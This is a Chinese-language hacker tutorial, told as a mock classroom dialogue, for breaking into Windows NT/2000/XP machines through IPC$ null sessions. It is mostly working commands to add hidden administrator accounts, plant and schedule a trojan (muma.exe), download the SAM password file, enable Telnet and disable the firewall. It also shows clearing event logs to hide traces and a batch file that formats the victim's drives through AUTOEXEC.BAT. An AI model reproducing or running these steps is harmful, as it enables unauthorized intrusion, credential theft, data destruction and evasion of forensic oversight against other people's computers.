IPC$入侵+开3389+在图形界面下把禁用的Guest克隆成隐身管理员+伪装+克隆多个用户

(经典漏洞)
一、IPC$连接↓
在桌面开始→运行输入:cmd
连接目标↓
net use file://xxx.xxx.xxx.xxx/IPC$ "" /user:"administrator"
这里让我来给大家解释一下:如果显示“命令成功”证明与对方连接成功!""意思是空密码.
(台下的菜鸟议论纷纷……为什么我连不上IPC$?)
本人:只有NT/2000/XP及以上系统才可以建立IPC$.
错误号5 “意思是拒绝访问很可能你使用的用户不是管理员权限的先提升权限”
错误号51 “意思是Windows无法找到网络路径网络有问题”
错误号53 “意思是找不到网络路径IP地址错误目标未开机目标lanmanserver服务未启动目标有防火墙(端口过滤)”
错误号67 “意思是找不到网络名你的lanmanworkstation服务未启动目标删除了IPC$”
错误号1219 “意思是提供的凭据与已存在的凭据集冲突你已经和对方建立了一个IPC$意思是请删除再连”
错误号1326 “意思是未知的用户名或错误密码原因很明显了”
错误号1792 “意思是试图登录意思是但是网络登录服务没有启动目标NetLogon服务未启动.(连接域控会出现此情况)”
错误号2242 “意思是此用户的密码已经过期目标有帐号策略意思是强制定期要求更改密码”
(注意以下的操作您必须连接成功才可以使用)

创建用户↓
net user fouliny$ 123456 /add
这里让我来给大家解释一下:123456是密码.

删除用户↓
net user fouliny$ /del

用户升级为管理员权限↓
net localgroup administrators fouliny$ /add

激活Guest↓
net user Guest /active:yes

禁止Guest↓
net user Guest /active:no

创建Guest密码↓
net user Guest 123456

上传↓
Copy muma.exe file://xxx.xxx.xxx.xxx/C$
这里让我来给大家解释一下:C$是上传木马到C盘(本人:嘿嘿……这里给它上传个远程木马.来,掌声鼓励!其菜鸟:为什么要上传个远程木马呢?盗号木马不行吗?本人:我晕!因为远程木马实在太强大了,不得不用到它.有一半的控制权.种了远程木马后想种啥马都行…….哎哟……这次又是谁-_-?其菜鸟:那还等什么?还不快点给他上马!!!)

上传到WinNT目录里↓
Copy muma.exe file://xxx.xxx.xxx.xxx/admin$ (注意:admin$意思是上传到WinNT)

下载↓
Copy file://xxx.xxx.xxx.xxx/admin$/system32/config/SAM F:\
这里让我来给大家解释一下:如果对方设置密码,就下载C:\WinNT\system32\config\SAM到本地破解.

查看对方时间↓
net time file://xxx.xxx.xxx.xxx/

新建一个作业↓
at file://xxx.xxx.xxx.xxx/ 12:00 muma.exe
这里让我来给大家解释一下:启动“计划”服务使计算机可以使用at命令在指定时间启动程序,必须开schedule服务.(其菜鸟:还等什么那还不快点启动!!!)

启动schedule服务↓
net start schedule

查看远程计算机上的全部计划作业↓
at file://xxx.xxx.xxx.xxx/

取消远程计算机上的第1个计划作业↓(1是代表第一个作业)
at file://xxx.xxx.xxx.xxx/ 1 /del

取消远程计算机上的全部计划作业↓
at file://xxx.xxx.xxx.xxx/ all /del

再次查看对方时间↓
net time file://xxx.xxx.xxx.xxx/
这里让我来给大家解释一下:如果对方的时间已经超过12:00,比如12:01表示木马已成功运行!(台下的菜鸟热烈的起哄……其菜鸟:为什么我的木马不上线?本人:可能是你的木马被对方的杀毒软件查杀了也可能是被对方的防火墙禁止了它所开放的端口……其菜鸟:我@@!该死的杀软防软……)

把本机的时间和对方的时间一样↓
net time file://xxx.xxx.xxx.xxx/ /set

定时重启↓
at 21:00 ShutDown –R –T 30
这里让我来给大家解释一下:该命令运行后,到了21:00点,电脑会出现“系统关机”对话框,并30秒延时自动重启.如果不想延时时间,可以把“-T 30”去掉即可.

-R是重启,到12点自动重启
-S是关机
-L是注销
-A是取消
-C是消息内容,不能超过127个字

定时提醒↓
命令:at 12:00 Net Send XXX.XXX.XXX.XXX 〖HmhK〗环保过滤今期特码……
这里让我来给大家解释一下:Net Send是Windows内部程序,可以发送消息到网络上的其他用户、计算机.这个功能在Windows中也称作“信使服务”.

定时自动运行批量处理文件↓
命令:at 12:00AM /Every:day 1.bat
(其菜鸟:day是什么意思?本人:我晕!你读几年级了?回去把英语学好了再学Hacker吧!)这里让我来给大家解释一下:day是“天”的意思,是指每天早上12:00点,电脑定时启动1.bat批处理文件.如果想每个星期六运行,把day该成Saturday即可.

(其菜鸟:有没有更爽的?本人:有!如果你觉得还不够爽,弄个明天定时格式化批量处理文件)代码如下↓
-----------------
@format d: /q/u/y
@format e: /q/u/y
@format f: /q/u/y
-----------------
如果有其他盘依次类推.
@是隐藏路径的意思,format是Windows内部程序,/q是快速格式化,/u是一但删除无法还原(这个命令很危险),/y是同意的意思.

AUTOEXEC.BAT这个批量处理文件不用我多说了吧!它是隐藏在系统盘的目录下开机时都要运行这个批量处理文件,把以上格式化批量处理文件的代码复制进去,等对方重启后,什么东西也没了,即时保存后再重启也一样……
注意:本人不建议您用以上格式化批量处理文件去格式化对方的盘,要做个有良心的人.(哎……放心吧!我们很有良心的……)

(嘿嘿……本人已经扫过这台机子已经开了23端口……台下的菜鸟热烈的起哄……)
Telnet服务↓
net start Telnet
如果对方没有禁止Telnet,那就帮它启动.
(其菜鸟:start是什么意思?)
这里让我来给大家解释一下:start是启动命令、stop是停止、pause是暂停、continue是恢复.

连接对方的Telnet服务↓
Telnet XXX.XXX.XXX.XXX
登录时一般要用户和密码,如果登录成功了想干什么就干什么……
登录成功后,还要懂一些DOS命令.

CD打开指定路径↓
CD C:\WINNT\SYSTEM32\

D:打开D盘↓
D:

新建文件夹↓
MD C:\123

删除文件夹(注意:空的才可以)↓
RD C:\123

查看当前系统目录↓
DIR

显示或设置日期↓
DATE

显示或设置时间↓
TIME

查看其他目录↓
DIR D:\

移动C盘文件夹里的文件到D盘↓
MOVE C:\*.EXE D:\
此命令可以将C盘下所有扩展名为EXE的文件移动到D盘

复制C盘文件夹里的文件到D盘↓
Copy C:\123\muma.exe D:\

复制C盘文件夹里的全部文件到D盘的123文件夹里↓
Copy C:\123\*.* D:\123\
注意:D盘里一定要有123文件夹,否则复制不成功.

不管有没有文件夹都会自动新建一个↓
XCopy C:\123\*.* D:\123\/s/e

在C盘下把文件设为只读属性↓
attrib +r muma.exe
+是钩选,-是取消.

+h是隐藏
+a是存储
+s是系统

如果设为attrib +h +s muma.exe
意思是:隐藏无法运行.

删除指定的文件(ERASE也可以)↓
del C:\Windows\system32\muma.exe

删除指定的扩展名文件↓
del C:\Windows\system32\*.log
这里让我来给大家解释一下:*.log是指全部扩展名为log的文件.

删除全部文件↓
del C:\Windows\system32\*

(其菜鸟:哎哟……输入太多命令了,看起来密密麻麻可以清除吗?本人:可以!输入:cls回车即可.)

打开net use↓
net start lanmanserver

启动Server服务(IPC$和共享要@@这个服务)↓
net start Server

启动Messenger信使服务↓
net start Messenger
(其菜鸟:不怪得我上次想发送条信息给肉鸡玩玩,怎么老发不了,原来是没有开这项服务.)

将C盘映射为abc$↓
net share abc$=C:\
这里让我来给大家解释一下:加了“$”之后为隐藏的共享目录.

与对方创建共享并映射驱动器到本地z盘↓
net use z: file://192.168.0.1/C$ "" /user:"administrator"

删除映射的C盘↓
net use C:\ /del

删除全部↓
net use * /del /Y

查看对方系统类型↓
type C:\boot.ini

查看对方机子IP↓
IPConfig /all

关闭Windows自带的防火墙两条命令其中任意一条↓
net stop sharedaccess
netsh firewall set opmode disable

启用Windows自带的防火墙两条命令其中任意一条↓
net start sharedaccess
netsh firewall set opmode enable

查看谁连接过↓
net session

清除日记↓
清除应用日记C:\WINNT\system32\config\appevent.log
清除系统日记C:\WINNT\system32\config\sysevent.log
清除安全日记C:\WINNT\system32\config\secevent.log

关闭“事件日志”服务↓(该服务将事件记录在本地计算机上)
net stop Eventlog
(其菜鸟:不怪得上次警察叔叔来我家……)

远程重启↓
Shutdown file://xxx.xxx.xxx.xxx/ 12:00 /fr (/fr是强制重启,/r是普通重启)

断开连接↓
net use file://xxx.xxx.xxx.xxx/IPC$ /del
(其菜鸟:喂!这么快就走,我们还没爽够呢……台下的菜鸟大喊怎么开对方的3389!!!本人:哇!不要生气,好好好!)请看以下大屏幕↓